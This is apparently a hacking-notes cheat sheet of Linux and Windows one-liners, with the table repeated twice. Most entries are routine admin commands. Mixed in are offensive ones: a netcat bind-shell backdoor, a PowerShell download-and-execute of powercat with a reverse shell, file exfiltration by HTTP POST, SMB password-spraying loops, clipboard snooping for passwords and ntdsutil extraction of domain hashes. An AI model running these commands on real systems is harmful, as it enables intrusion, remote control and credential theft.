One-Liners

Quick fast and speedy

Linux

Command

Purpose

GREENIE=haha; export GREENIE

Create an environment var, then export var to be available to other programs

PATH=$PATH:/root/haha

adds a folder to PATH while retaining it

sort | uniq -c | sort -n

Takes stdin, sorts it, finds out the count of each unique value, then sorts by number

cat squid_access.log | sort -k 2 | head

Using the sort -k parameters sorts on the second colmun of the output

wc -l [lines]

wc -c [bytes]

wc -w [words]

Count lines/bytes/words in a file or from stdin

awk '{print $1,$4}'

Print characters 1 and 4 (not zero indexed) from stdin

awk '{print $(NF-1)}'

print the 2nd to last column

awk '{print length, $1}'

print the length of each line and the contents

awk '{ sum += $1 } END { print sum }'

Takes the lines from a file/stdin and adds up the values, quick and dirty calculator in terminal

cat peptides.txt | while read line; do echo $line; done

read in lines from peptides.txt, then perform echo for each line. Useful to loop through commands for a list of items

cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done

Password spraying using a bash loop

for i in {1..5}; do echo $i; done

Loops from 1 to 5 and echos for each value of i

for i in {000..999}; do echo KEY-HAHA-$i; done

Creates a list of all values from KEY-HAHA-000 to KEY-HAHA-999

TF=$(mktemp -d)

Create a temporary directory (i.e. /tmp/tmp.gq9gT5U3) and assign as an environment variable

${#TF}

bash will return the amount of characters in the TF variable

sed 's/12/13/g'

Replace 12 with 13 found anywhere in stdin, will replace 1234 with 1334

sed -i.bak '/line to delete/d' *

Delete a line of text for all files in a directory

xxd -p

Print the hex of stdin or a file only, no hexdump format

xxd -r

Interpret raw hex from stdin, can redirect to save the hex to a file

tr -d '\r' | tr -d '\n' | xxd -r -p

Takes hex input, removes newlines, and places into a file

find / -user Matt 2>/dev/null

Find all files owned by Matt on the box, redirects stderr to null

find /etc -type f --name apache2.*

Find any file which begins with apache2.* in /etc

grep -E "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

grep with regex to match any valid IP address (yes it's ugly)

curl -d "param1=value&param2=value" https://example.com/resource.cgi

Send parameters with curl

date -d @1286536308

convert an epoch timestamp to date output

mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe

Create netcat backdoor without -e support. Generates a named pipe to funnel data

tar -zcvf files.tar.gz /var/log/apache2

Creates a files.tar.gz archive of all files in /var/log/apache2

prips 10.10.10.0/24

Prints all IPs in a specific subnet

ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255

assign an IP from terminal

ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up

change MAC for interface

dhclient eth0

request DHCP address

dd if=./input.file of=./outfile

make a bit-by-bit copy of a file or system

sudo ln -s /usr/bin/python3 /usr/bin/python

create a symbolic link for python to run python3

sudo mkdir /mnt/new

mount /dev/sbd1 /mnt/new

umount /dev/sdb1

mount/unmount a filesystem

Add another default route with a higher metric to choose a different interface to access the Internet

sudo dhclient wlan0

Request a new DHCP lease on interface wlan0

encrypt a file with a password at the commandline

decrypt a file using a password at the commandline

Windows

Command

Purpose

get-childitem -hidden

See all files in current dir

gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null

search through all files in C:\ for the string password

1..255 | % {ping -n1 192.168.0.$_ | sls ttl}

Counting loop for ping sweep

(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")

Downloads a file to the C:\ location

IEX(New-Object System.Net.Webclient).DownloadString('http://10.1.1.1:8000/powercat.ps1');powercat -c 10.1.1.1 -p 8001 -e powershell.exe

download a ps1 file and execute it in MEMORY only

certutil -hashfile ntds.dit md5

Hash a file

certutil -encodehex ntds.dit ntds.hex

Encode a file as hex

certutil -encode test.jpg test.base64

certutil -decode test.base64 test.jpg

Encode and decode a file as base64

@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL

Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB

Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials

Sends the file to a server, catch the file on the other end

iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1

Download a file from another machine

$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }

Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!)

ntdsutil

activate instance ntds

ifm

create full C:\ntds

quit

Use built-in ntdsutil tool to obtain the SYSTEM registry and hive data as a backup, contains user hashes to crack

PreviousHacking Notes NextExploit Workflow

Last updated 2 years ago

Was this helpful?

Linux

Command

Purpose

GREENIE=haha; export GREENIE

Create an environment var, then export var to be available to other programs

PATH=$PATH:/root/haha

adds a folder to PATH while retaining it

sort | uniq -c | sort -n

Takes stdin, sorts it, finds out the count of each unique value, then sorts by number

cat squid_access.log | sort -k 2 | head

Using the sort -k parameters sorts on the second colmun of the output

wc -l [lines]

wc -c [bytes]

wc -w [words]

Count lines/bytes/words in a file or from stdin

awk '{print $1,$4}'

Print characters 1 and 4 (not zero indexed) from stdin

awk '{print $(NF-1)}'

print the 2nd to last column

awk '{print length, $1}'

print the length of each line and the contents

awk '{ sum += $1 } END { print sum }'

Takes the lines from a file/stdin and adds up the values, quick and dirty calculator in terminal

cat peptides.txt | while read line; do echo $line; done

read in lines from peptides.txt, then perform echo for each line. Useful to loop through commands for a list of items

cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done

Password spraying using a bash loop

for i in {1..5}; do echo $i; done

Loops from 1 to 5 and echos for each value of i

for i in {000..999}; do echo KEY-HAHA-$i; done

Creates a list of all values from KEY-HAHA-000 to KEY-HAHA-999

TF=$(mktemp -d)

Create a temporary directory (i.e. /tmp/tmp.gq9gT5U3) and assign as an environment variable

${#TF}

bash will return the amount of characters in the TF variable

sed 's/12/13/g'

Replace 12 with 13 found anywhere in stdin, will replace 1234 with 1334

sed -i.bak '/line to delete/d' *

Delete a line of text for all files in a directory

xxd -p

Print the hex of stdin or a file only, no hexdump format

xxd -r

Interpret raw hex from stdin, can redirect to save the hex to a file

tr -d '\r' | tr -d '\n' | xxd -r -p

Takes hex input, removes newlines, and places into a file

find / -user Matt 2>/dev/null

Find all files owned by Matt on the box, redirects stderr to null

find /etc -type f --name apache2.*

Find any file which begins with apache2.* in /etc

grep -E "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

grep with regex to match any valid IP address (yes it's ugly)

curl -d "param1=value&param2=value" https://example.com/resource.cgi

Send parameters with curl

date -d @1286536308

convert an epoch timestamp to date output

mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe

Create netcat backdoor without -e support. Generates a named pipe to funnel data

tar -zcvf files.tar.gz /var/log/apache2

Creates a files.tar.gz archive of all files in /var/log/apache2

prips 10.10.10.0/24

Prints all IPs in a specific subnet

ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255

assign an IP from terminal

ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up

change MAC for interface

dhclient eth0

request DHCP address

dd if=./input.file of=./outfile

make a bit-by-bit copy of a file or system

sudo ln -s /usr/bin/python3 /usr/bin/python

create a symbolic link for python to run python3

sudo mkdir /mnt/new

mount /dev/sbd1 /mnt/new

umount /dev/sdb1

mount/unmount a filesystem

sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1

Add another default route with a higher metric to choose a different interface to access the Internet

sudo dhclient wlan0

Request a new DHCP lease on interface wlan0

openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc

encrypt a file with a password at the commandline

openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt

decrypt a file using a password at the commandline

Windows

Command

Purpose

get-childitem -hidden

See all files in current dir

gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null

search through all files in C:\ for the string password

1..255 | % {ping -n1 192.168.0.$_ | sls ttl}

Counting loop for ping sweep

(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")

Downloads a file to the C:\ location

IEX(New-Object System.Net.Webclient).DownloadString('http://10.1.1.1:8000/powercat.ps1');powercat -c 10.1.1.1 -p 8001 -e powershell.exe

download a ps1 file and execute it in MEMORY only

certutil -hashfile ntds.dit md5

Hash a file

certutil -encodehex ntds.dit ntds.hex

Encode a file as hex

certutil -encode test.jpg test.base64

certutil -decode test.base64 test.jpg

Encode and decode a file as base64

@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL

Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB

Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials

Sends the file to a server, catch the file on the other end

iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1

Download a file from another machine

$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }

Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!)

ntdsutil

activate instance ntds

ifm

create full C:\ntds

quit

Use built-in ntdsutil tool to obtain the SYSTEM registry and hive data as a backup, contains user hashes to crack